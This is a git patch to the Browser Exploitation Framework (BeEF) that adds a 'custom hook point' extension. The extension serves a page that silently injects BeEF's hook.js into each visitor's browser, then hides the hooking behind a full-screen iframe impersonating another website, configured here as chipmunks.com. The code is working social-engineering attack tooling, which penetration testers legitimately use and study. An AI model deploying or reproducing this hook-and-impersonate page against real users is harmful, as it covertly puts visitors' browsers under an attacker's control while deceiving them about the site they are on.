From a6a7536e736e7788e12df91756a8f132ced24970 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Thu, 17 May 2012 18:52:35 +0800
Subject: [PATCH] Issue #678 - Custom Hook Point Extension initial commit

---
 extensions/customhook/api.rb          | 38 +++++++++++++++++
 extensions/customhook/config.yaml     | 24 +++++++++++
 extensions/customhook/extension.rb    | 33 +++++++++++++++
 extensions/customhook/handler.rb      | 61 +++++++++++++++++++++++++++
 extensions/customhook/html/index.html | 18 ++++++++
 5 files changed, 174 insertions(+)
 create mode 100644 extensions/customhook/api.rb
 create mode 100644 extensions/customhook/config.yaml
 create mode 100644 extensions/customhook/extension.rb
 create mode 100644 extensions/customhook/handler.rb
 create mode 100644 extensions/customhook/html/index.html

diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb
new file mode 100644
index 000000000..90a47bdb9
--- /dev/null
+++ b/extensions/customhook/api.rb
@@ -0,0 +1,38 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+  
+  module RegisterHttpHandlers
+    
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Customhook::RegisterHttpHandlers, BeEF::API::Server, 'mount_handler')
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Customhook::RegisterHttpHandlers, BeEF::API::Server, 'pre_http_start')
+    
+    def self.mount_handler(beef_server)
+      configuration = BeEF::Core::Configuration.instance
+      beef_server.mount(configuration.get("beef.extension.customhook.customhook_path"), BeEF::Extension::Customhook::Handler.new)
+    end
+
+    def self.pre_http_start(beef_server)
+      configuration = BeEF::Core::Configuration.instance
+      print_success "Successfully mounted a custom hook point"
+      print_more "Mount Point: #{configuration.get('beef.extension.customhook.customhook_path')}\nLoading iFrame: #{configuration.get('beef.extension.customhook.customhook_target')}\n"
+    end
+  end
+end
+end
+end
diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml
new file mode 100644
index 000000000..9daf85e72
--- /dev/null
+++ b/extensions/customhook/config.yaml
@@ -0,0 +1,24 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        customhook:
+            enable: false
+            name: 'Custom Hook Point with iFrame Impersonation'
+            customhook_path: "/yougotchipmunked"
+            customhook_target: "http://www.chipmunks.com"
+            customhook_title: "Alvin and the Chipmunks.."
+
diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb
new file mode 100644
index 000000000..089425f23
--- /dev/null
+++ b/extensions/customhook/extension.rb
@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+  
+  extend BeEF::API::Extension
+  
+  @short_name = 'customhook'
+  
+  @full_name = 'Custom Hook Point with iFrame Impersonation'
+  
+  @description = 'An auto-hook and full-screen iframe - demonstrating extension creation and social engineering attacks'
+  
+end
+end
+end
+
+require 'extensions/customhook/api'
+require 'extensions/customhook/handler'
diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb
new file mode 100644
index 000000000..04b601094
--- /dev/null
+++ b/extensions/customhook/handler.rb
@@ -0,0 +1,61 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+module Customhook
+  
+    class Handler
+
+    def call(env)
+      @body = ''
+      @request = Rack::Request.new(env)
+      @params = @request.query_string
+      @response = Rack::Response.new(body=[], 200, header={})
+      config = BeEF::Core::Configuration.instance
+
+      eruby = Erubis::FastEruby.new(File.read(File.dirname(__FILE__)+'/html/index.html'))
+
+      @body << eruby.evaluate({'customhook_target' => config.get("beef.extension.customhook.customhook_target"),
+        'customhook_title' => config.get("beef.extension.customhook.customhook_title")})
+      
+      @response = Rack::Response.new(
+            body = [@body],
+            status = 200,
+            header = {
+              'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0',
+              'Content-Type' => 'text/html',
+              'Access-Control-Allow-Origin' => '*',
+              'Access-Control-Allow-Methods' => 'POST, GET'
+            }
+        )
+      
+    end
+
+    private
+    
+    # @note Object representing the HTTP request
+    @request
+    
+    # @note Object representing the HTTP response
+    @response
+    
+  end
+  
+end
+end
+end
diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html
new file mode 100644
index 000000000..c1acd833a
--- /dev/null
+++ b/extensions/customhook/html/index.html
@@ -0,0 +1,18 @@
+<html>
+<head>
+	<title><%= @customhook_title %></title>
+	<script>
+		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
+		document.write(commandModuleStr);
+	</script>
+</head>
+
+<body>
+	<script>
+		setTimeout("beef.dom.createIframe('fullscreen','get',{'src':'<%= @customhook_target %>'},{},null)",2000);
+		document.body.scroll = "no";
+		document.documentElement.style.overflow = 'hidden';
+		//Porco dio - and away we go!
+	</script>
+</body>
+</html>